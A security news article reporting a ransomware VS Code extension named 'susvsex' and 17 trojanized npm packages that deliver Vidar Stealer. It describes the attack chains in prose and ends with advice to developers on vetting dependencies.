Security

Devs Targeted: Ransomware Lurks in VS Code & npm

Warning: AI-Generated Ransomware in VS Code & Vidar Stealer in npm Packages Expose Massive Developer Risk. Are You Infected?
Warning: Your Dev Tools Could Be a Gateway for Ransomware.
  • A malicious Visual Studio Code extension named "susvsex" was discovered with built-in ransomware capabilities, likely created with AI assistance.
  • Separately, security researchers unearthed 17 trojanized npm packages that deploy the Vidar information-stealing malware, downloaded over 2,240 times.
  • Both threats have been removed from their respective platforms, but they highlight a dangerous trend of supply chain attacks targeting software developers.
  • The incidents serve as a critical reminder for developers to scrutinize extensions and packages before integrating them into their workflow.

Your Development Environment is Under Attack

In a stark warning to the developer community, researchers have exposed two separate but equally alarming supply chain attacks targeting the open-source ecosystem. A malicious Visual Studio Code (VS Code) extension was found containing ransomware, while a cluster of npm packages was caught distributing the notorious Vidar information stealer. These incidents prove that attackers are increasingly focusing on the tools developers trust most.

AI-Generated Ransomware Hits VS Code Marketplace

Cybersecurity researcher John Tuckner of Secure Annex flagged a malicious VS Code extension ominously titled "susvsex." The extension, uploaded by a user named "suspublisher18," made no effort to hide its nefarious purpose, with a description that read, "Automatically zips, uploads, and encrypts files."

Dubbed "vibe-coded," the extension appears to have been created with the help of AI, containing extraneous comments, placeholder variables, and glaring security flaws. In a shocking oversight, the package even included decryption tools and GitHub access keys to its own command-and-control (C2) server. Its core function was to activate upon launch, archive a target directory, exfiltrate the data, and then encrypt the original files. Fortunately, the target directory was a test folder, limiting its immediate impact.

Microsoft has since removed the extension from the official VS Code Marketplace.

Vidar Stealer Spreads Through Trojanized npm Packages

In a parallel discovery, Datadog Security Labs identified 17 malicious npm packages designed to infect systems with Vidar Stealer, a potent malware known for harvesting sensitive information. This campaign marks the first documented instance of Vidar being distributed via the npm registry.

A Deceptive Attack Chain

The threat actors, tracked as MUT-4831, published packages masquerading as benign software development kits (SDKs). Once installed, a post-install script specified in the package.json file would trigger, downloading a ZIP archive from an external server containing the Vidar executable. The malware then used hard-coded Telegram and Steam accounts to locate its actual C2 server.

Before being taken down, the malicious libraries were downloaded at least 2,240 times. While many of these could be from automated scrapers, the potential for widespread infection was significant.

A Sobering Reminder for Open-Source Security

These attacks are part of a disturbing trend targeting the open-source software supply chain, affecting platforms like npm, PyPI, RubyGems, and now the VS Code Marketplace. They serve as a crucial reminder that developers must exercise extreme caution. It is vital to perform due diligence, review code and changelogs, and be wary of typosquatting and other social engineering tactics before installing any new tool or dependency.

Read more